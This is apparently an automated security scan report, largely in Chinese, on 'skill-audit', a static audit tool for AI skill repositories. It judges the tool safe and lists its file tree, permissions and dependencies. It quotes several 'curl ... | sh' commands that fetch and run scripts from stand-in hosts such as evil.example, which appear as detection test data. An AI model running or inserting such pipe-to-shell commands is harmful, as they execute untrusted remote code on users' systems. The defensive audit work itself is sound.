Scan Report
This report was generated in Chinese. Some content may be in Chinese.
5 /100
skill-audit
第三方 AI 技能/插件仓库的确定性静态安全审计工具
skill-audit 是一个合法的静态安全审计工具,预扫描标记的所有危险IOC均位于测试文件(tests/test_skill_safety_assessment.py)中作为测试数据,用于验证扫描器对危险模式的检测能力,不构成实际威胁。
Safe to install
批准使用。该工具仅执行静态分析,不执行目标仓库代码,符合 SKILL.md 声明的审计范围。
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | READ | READ | ✓ Aligned | SKILL.md:28-35 仅声明读取目标仓库进行审计 |
| Network | READ | READ | ✓ Aligned | 仅在 GitHub OSINT 预检时发起只读 API 请求 |
| Shell | NONE | NONE | — | SKILL.md:18 明确声明不执行目标仓库代码 |
| Environment | NONE | NONE | — | 未访问任何环境变量 |
| Skill Invoke | NONE | NONE | — | 无技能调用行为 |
6 Critical 13 findings
Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://evil.example/bootstrap.sh | sh tests/test_skill_safety_assessment.py:40 Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://evil.example/p.sh | sh tests/test_skill_safety_assessment.py:122 Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://evil.example/install.sh | sh tests/test_skill_safety_assessment.py:240 Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://example.com/payload.sh | sh tests/test_skill_safety_assessment.py:451 Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://x | sh tests/test_skill_safety_assessment.py:473 Critical Dangerous Command 危险 Shell 命令
curl -fsSL https://evil.example/payload.sh | sh tests/test_skill_safety_assessment.py:634 Medium External URL 外部 URL
https://evil.example/bootstrap.sh tests/test_skill_safety_assessment.py:40 Medium External URL 外部 URL
https://evil.example/p.sh tests/test_skill_safety_assessment.py:122 Medium External URL 外部 URL
https://evil.example/install.sh tests/test_skill_safety_assessment.py:240 Medium External URL 外部 URL
https://evil.example/payload.py tests/test_skill_safety_assessment.py:356 Medium External URL 外部 URL
https://evil.example/payload.sh tests/test_skill_safety_assessment.py:634 Medium External URL 外部 URL
https://gitlab.com/mode-io/mode-io-skills tests/test_skill_safety_precheck.py:35 Info Email 邮箱地址
[email protected] tests/test_skill_safety_precheck.py:32 File Tree
36 files · 216.2 KB · 6232 lines Python 28f · 5854L
Markdown 5f · 273L
JSON 2f · 89L
TOML 1f · 16L
├─
▾
modeio_skill_audit
│ ├─
▾
cli
│ │ ├─
__init__.py
Python
│ │ └─
skill_safety_assessment.py
Python
│ ├─
▾
skill_safety
│ │ ├─
▾
scanners
│ │ │ ├─
__init__.py
Python
│ │ │ ├─
capability.py
Python
│ │ │ ├─
execution.py
Python
│ │ │ ├─
prompt.py
Python
│ │ │ ├─
secret.py
⚠
Python
│ │ │ └─
supply_chain.py
Python
│ │ ├─
__init__.py
Python
│ │ ├─
adjudication.py
Python
│ │ ├─
collector.py
Python
│ │ ├─
common.py
Python
│ │ ├─
constants.py
Python
│ │ ├─
context.py
Python
│ │ ├─
engine.py
Python
│ │ ├─
finding.py
Python
│ │ ├─
json_utils.py
Python
│ │ ├─
models.py
Python
│ │ ├─
prompt_payload.py
Python
│ │ ├─
repo_intel.py
Python
│ │ ├─
scoring.py
Python
│ │ └─
validation.py
Python
│ └─
__init__.py
Python
├─
▾
references
│ ├─
▾
repo_sets
│ │ ├─
fresh_holdout_repos.json
JSON
│ │ └─
fresh_sourcepack_repos.json
JSON
│ ├─
architecture.md
Markdown
│ ├─
benchmarking.md
Markdown
│ ├─
output-contract.md
Markdown
│ └─
prompt-contract.md
Markdown
├─
▾
scripts
│ ├─
run_repo_set.py
Python
│ └─
skill_safety_assessment.py
Python
├─
▾
tests
│ ├─
test_packaging_surface.py
Python
│ ├─
test_skill_safety_assessment.py
Python
│ └─
test_skill_safety_precheck.py
Python
├─
pyproject.toml
TOML
└─
SKILL.md
Markdown
Dependencies 2 items
| Package | Version | Source | Known Vulns | Notes |
|---|---|---|---|---|
setuptools | >=68 | pip | No | 标准构建工具 |
wheel | * | pip | No | 标准构建工具 |
Security Positives
✓ SKILL.md 完整声明了功能范围(静态审计、不执行代码)
✓ 代码与文档声明高度一致,无阴影功能
✓ 依赖简单,仅使用 setuptools 和 wheel,无第三方高风险依赖
✓ 预扫描 IOC 实为测试数据,验证扫描器检测能力
✓ 敏感文件标记(secret.py)是安全扫描器模块本身,非恶意代码